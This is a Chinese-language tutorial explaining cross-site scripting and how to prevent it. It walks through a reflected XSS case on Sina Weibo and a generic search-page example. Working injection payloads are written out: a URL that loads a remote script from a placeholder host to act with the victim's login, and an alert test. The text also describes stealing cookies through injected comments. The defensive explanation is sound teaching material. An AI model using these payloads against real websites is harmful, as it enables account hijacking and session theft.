一、前言
XSS 即 Cross Site Script,跨站脚本攻击;缩写应该是 CSS,但为了和 CSS(Cascading Style Sheet,层叠样式表) 有所区分,因而改叫 XSS
也就通过利用网站漏洞,通过网址,输入框等方式构造恶意脚本( java script) ,用脚本进行攻击的一种方式。
二、概述
案例
新浪微博 XSS 漏洞
1) 攻击者发现漏洞:发现 http://weibo.com/pub/star/g/xyyyd 这个 URL 的内容未经过滤直接输出到 HTML 中。
2) 于是攻击者构建出一个 URL,然后诱导用户去点击:
http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>
用户点击这个 URL 时,服务端取出请求 URL,拼接到 HTML 响应中:
复制代码<li><a href="http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>">按分类检索</a></li>
3) 浏览器接收到响应后就会加载执行恶意脚本 //xxxx.cn/image/t.js,在恶意脚本中利用用户的登录状态进行关注、发微博、发私信等操作
(1) 发现漏洞,比如:
- 网址中的链接可以注入脚本
比如 某网站搜索页面的网址是:http://xxx/search?keyword=搜索词。这个页面打开后会将“搜索词” 相显示在页面中。那么,构造一个
http://xxx/search?keyword="><script>alert('XSS');</script>
这样的网址,让用户点击,就可以进行攻击
- 文本输入框
- 富文本编辑器,比如,发帖,评论。通过在帖子,评论中注入 script脚本, 当查看评论时触发脚本,自动发送cookie信息等。
- 将一些隐私数据像 cookie、session 发送给攻击者,将受害者重定向到一个由攻击者控制的网站,在受害者的机器上进行一些恶意操作。
三、如何预防xss攻击
整体的 XSS 防范是非常复杂和繁琐的,我们不仅需要在全部需要转义的位置,对数据进行对应的转义。而且要防止多余和错误的转义,避免正常的用户输入出现乱码。
输入过滤
在用户提交时,由前端过滤输入,然后提交到后端。这样做是否可行呢?
答案是不可行。一旦攻击者绕过前端过滤,直接构造请求,就可以提交恶意代码了。
那么,换一个过滤时机:后端在写入数据库前,对输入进行过滤,然后把“安全的”内容,返回给前端。这样是否可行呢?问题是:在提交阶段,我们并不确定内容要输出到哪里,输入侧过滤能够在某些情况下解决特定的 XSS 问题,但会引入很大的不确定性和乱码问题。在防范 XSS 攻击时应避免此类方法。
通过“防止浏览器执行恶意代码”来防范 XSS
- 防止 HTML 中出现注入。显示“来自用户输入的内容时”,要进行格式化转义
- 防止 JavaScript 执行时,执行恶意代码。比如 发评论的内容不能有脚本本执行。
- json 中也能被注入脚本。
JSON 也是不安全的:当 JSON 中包含 U+2028 或 U+2029 这两个字符时,不能作为 JavaScript 的字面量使用,否则会抛出语法错误。
当 JSON 中包含字符串 </script> 时,当前的 script 标签将会被闭合,后面的字符串内容浏览器会按照 HTML 进行解析;通过增加下一个 <script> 标签等方法就可以完成注入。
